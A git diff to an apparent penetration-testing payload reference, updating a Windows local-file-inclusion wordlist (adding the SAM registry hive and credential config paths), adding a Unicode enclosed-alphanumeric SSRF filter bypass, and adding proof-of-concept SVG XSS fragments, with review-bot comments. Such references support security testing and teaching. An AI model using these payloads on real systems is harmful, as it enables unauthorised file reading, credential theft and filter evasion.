diff --git a/File Inclusion - Path Traversal/Intruders/LFI-WindowsFileCheck.txt b/File Inclusion - Path Traversal/Intruders/LFI-WindowsFileCheck.txt
index 5a4a94d..a56868a 100644
--- a/File Inclusion - Path Traversal/Intruders/LFI-WindowsFileCheck.txt
+++ b/File Inclusion - Path Traversal/Intruders/LFI-WindowsFileCheck.txt
@@ -2,67 +2,68 @@ php://input
 C:\boot.ini
 C:\WINDOWS\win.ini
 C:\WINDOWS\php.ini
+C:\WINDOWS\System32\Config\SAM
 C:\WINNT\php.ini
-\xampp\phpMyAdmin\config.inc
-\xampp\phpMyAdmin\phpinfo.php
-\xampp\phpmyadmin\config.inc
-\xampp\phpmyadmin\phpinfo.php
-\xampp\phpmyadmin\config.inc.php
-\xampp\phpMyAdmin\config.inc.php
-\xampp\apache\conf\httpd.conf
-\xampp\FileZillaFTP\FileZilla Server.xml
-\xampp\MercuryMail\mercury.ini
-\mysql\bin\my.ini
-\xampp\php\php.ini
-\xampp\phpMyAdmin\config.inc.php
-\xampp\tomcat\conf\tomcat-users.xml
-\xampp\tomcat\conf\web.xml
-\xampp\sendmail\sendmail.ini
-\xampp\webalizer\webalizer.conf
-\xampp\webdav\webdav.txt
-\xampp\apache\logs\error.log
-\xampp\apache\logs\access.log
-\xampp\FileZillaFTP\Logs
-\xampp\FileZillaFTP\Logs\error.log
-\xampp\FileZillaFTP\Logs\access.log
-\xampp\MercuryMail\LOGS\error.log
-\xampp\MercuryMail\LOGS\access.log
-\xampp\mysql\data\mysql.err
-\xampp\sendmail\sendmail.log
-\apache\log\error.log
-\apache\log\access.log
-\apache\log\error_log
-\apache\log\access_log
-\apache2\log\error.log
-\apache2\log\access.log
-\apache2\log\error_log
-\apache2\log\access_log
-\log\error.log
-\log\access.log
-\log\error_log
-\log\access_log
-\apache\logs\error.log
-\apache\logs\access.log
-\apache\logs\error_log
-\apache\logs\access_log
-\apache2\logs\error.log
-\apache2\logs\access.log
-\apache2\logs\error_log
-\apache2\logs\access_log
-\logs\error.log
-\logs\access.log
-\logs\error_log
-\logs\access_log
-\log\httpd\access_log
-\log\httpd\error_log
-\logs\httpd\access_log
-\logs\httpd\error_log
-\opt\xampp\logs\access_log
-\opt\xampp\logs\error_log
-\opt\xampp\logs\access.log
-\opt\xampp\logs\error.log
-\Program Files\Apache Group\Apache\logs\access.log
-\Program Files\Apache Group\Apache\logs\error.log
-\Program Files\Apache Group\Apache\conf\httpd.conf
-\Program Files\Apache Group\Apache2\conf\httpd.conf
-\Program Files\xampp\apache\conf\httpd.conf
\ No newline at end of file
+C:\xampp\phpMyAdmin\config.inc
+C:\xampp\phpMyAdmin\phpinfo.php
+C:\xampp\phpmyadmin\config.inc
+C:\xampp\phpmyadmin\phpinfo.php
+C:\xampp\phpmyadmin\config.inc.php
+C:\xampp\phpMyAdmin\config.inc.php
+C:\xampp\apache\conf\httpd.conf
+C:\xampp\FileZillaFTP\FileZilla Server.xml
+C:\xampp\MercuryMail\mercury.ini
+C:\mysql\bin\my.ini
+C:\xampp\php\php.ini
+C:\xampp\phpMyAdmin\config.inc.php
+C:\xampp\tomcat\conf\tomcat-users.xml
+C:\xampp\tomcat\conf\web.xml
+C:\xampp\sendmail\sendmail.ini
+C:\xampp\webalizer\webalizer.conf
+C:\xampp\webdav\webdav.txt
+C:\xampp\apache\logs\error.log
+C:\xampp\apache\logs\access.log
+C:\xampp\FileZillaFTP\Logs
+C:\xampp\FileZillaFTP\Logs\error.log
+C:\xampp\FileZillaFTP\Logs\access.log
+C:\xampp\MercuryMail\LOGS\error.log
+C:\xampp\MercuryMail\LOGS\access.log
+C:\xampp\mysql\data\mysql.err
+C:\xampp\sendmail\sendmail.log
+C:\apache\log\error.log
+C:\apache\log\access.log
+C:\apache\log\error_log
+C:\apache\log\access_log
+C:\apache2\log\error.log
+C:\apache2\log\access.log
+C:\apache2\log\error_log
+C:\apache2\log\access_log
+C:\log\error.log
+C:\log\access.log
+C:\log\error_log
+C:\log\access_log
+C:\apache\logs\error.log
+C:\apache\logs\access.log
+C:\apache\logs\error_log
+C:\apache\logs\access_log
+C:\apache2\logs\error.log
+C:\apache2\logs\access.log
+C:\apache2\logs\error_log
+C:\apache2\logs\access_log
+C:\logs\error.log
+C:\logs\access.log
+C:\logs\error_log
+C:\logs\access_log
+C:\log\httpd\access_log
+C:\log\httpd\error_log
+C:\logs\httpd\access_log
+C:\logs\httpd\error_log
+C:\opt\xampp\logs\access_log
+C:\opt\xampp\logs\error_log
+C:\opt\xampp\logs\access.log
+C:\opt\xampp\logs\error.log
+C:\Program Files\Apache Group\Apache\logs\access.log
+C:\Program Files\Apache Group\Apache\logs\error.log
+C:\Program Files\Apache Group\Apache\conf\httpd.conf
+C:\Program Files\Apache Group\Apache2\conf\httpd.conf
+C:\Program Files\xampp\apache\conf\httpd.conf
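Review bot: The new side still lists `C:\xampp\phpMyAdmin\config.inc.php` twice (once right after `C:\xampp\phpmyadmin\config.inc.php` and again after `C:\xampp\php\php.ini`), a duplicate carried over from the old drive-relative list that now costs an identical second request per run; drop the second copy. `C:\xampp\FileZillaFTP\Logs` names a directory rather than a file, and the four `C:\opt\xampp\logs\...` entries look like a Unix layout that was mechanically given a drive letter, so both are worth a second look. The added `C:\WINDOWS\System32\Config\SAM` is, as far as I know, held open exclusively by the running OS, so a miss on that entry says nothing about whether the inclusion itself works.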
diff --git a/SSRF injection/Parser & Curl < 7.54.png b/SSRF injection/Parser & Curl < 7.54.png
new file mode 100644
index 0000000..76fe429
Binary files /dev/null and b/SSRF injection/Parser & Curl < 7.54.png differ
diff --git a/SSRF injection/README.md b/SSRF injection/README.md
index 051d589..4211770 100644
--- a/SSRF injection/README.md
+++ b/SSRF injection/README.md
@@ -91,6 +91,15 @@ requests + browsers : 2.2.2.2
 urllib : 3.3.3.3
 ```
+Bypass using enclosed alphanumerics [@EdOverflow](https://twitter.com/EdOverflow)
+```
+http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
+
+List:
+① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
+```
+
+
 ## SSRF via URL Scheme
 Dict://
 The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
@@ -176,7 +185,9 @@ http://0251.00376.000251.0000376/ Dotted octal with padding
 * [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
 * [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648)
 * [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
+* [#HITBGSEC 2017 SG Conf D1 - A New Era Of SSRF - Exploiting Url Parsers - Orange Tsai](https://www.youtube.com/watch?v=D1S-G8rJrEk)
 * [SSRF Tips - xl7dev](http://blog.safebuff.com/2016/07/03/SSRF-Tips/)
 * [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748)
 * [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/)
 * [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)
+* [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow)
diff --git a/SSRF injection/SSRF_Parser.png b/SSRF injection/SSRF_Parser.png
new file mode 100644
index 0000000..016e5fe
Binary files /dev/null and b/SSRF injection/SSRF_Parser.png differ
diff --git a/XSS injection/Files/SVG_XSS1.svg b/XSS injection/Files/SVG_XSS1.svg
new file mode 100644
index 0000000..9a623c3
--- /dev/null
+++ b/XSS injection/Files/SVG_XSS1.svg
@@ -0,0 +1 @@
+</desc><script>alert(1)</script>
diff --git a/XSS injection/Files/SVG_XSS2.svg b/XSS injection/Files/SVG_XSS2.svg
new file mode 100644
index 0000000..8bf8ca9
--- /dev/null
+++ b/XSS injection/Files/SVG_XSS2.svg
@@ -0,0 +1 @@
+</foreignObject><script>alert(2)</script>
diff --git a/XSS injection/Files/SVG_XSS3.svg b/XSS injection/Files/SVG_XSS3.svg
new file mode 100644
index 0000000..b50b893
--- /dev/null
+++ b/XSS injection/Files/SVG_XSS3.svg
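Review bot: `SVG_XSS1.svg` is not a standalone SVG document — it has no `<svg>` root and opens with a closing `</desc>` tag — so any consumer that parses it as XML/SVG will reject it as malformed before anything in it is evaluated; the same applies to `SVG_XSS2.svg` and `SVG_XSS3.svg`. These read as fragments meant to be spliced into an existing `<desc>`, `<foreignObject>` or `<title>` element of a document the server already holds, which neither the filenames nor the README section introducing them says. A one-line note beside the "XSS in SVG (short)" block, e.g. `These three are fragments, not complete SVG files; each closes the element it lands in before the script element, so they only exercise sinks that insert text into an existing document.`, would make the intended context clear and tell a reader which controls (a schema-validating parser versus text splicing) each file actually tests.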
@@ -0,0 +1 @@
+</title><script>alert(3)</script>
diff --git a/XSS injection/README.md b/XSS injection/README.md
index c7d30fc..f691e18 100644
--- a/XSS injection/README.md
+++ b/XSS injection/README.md
@@ -178,6 +178,11 @@ XSS in SVG
 XSS in SVG (short)
 ```
+
+
+</desc><script>alert(1)</script>
+</foreignObject><script>alert(2)</script>
+</title><script>alert(3)</script>
 ```
 XSS in SWF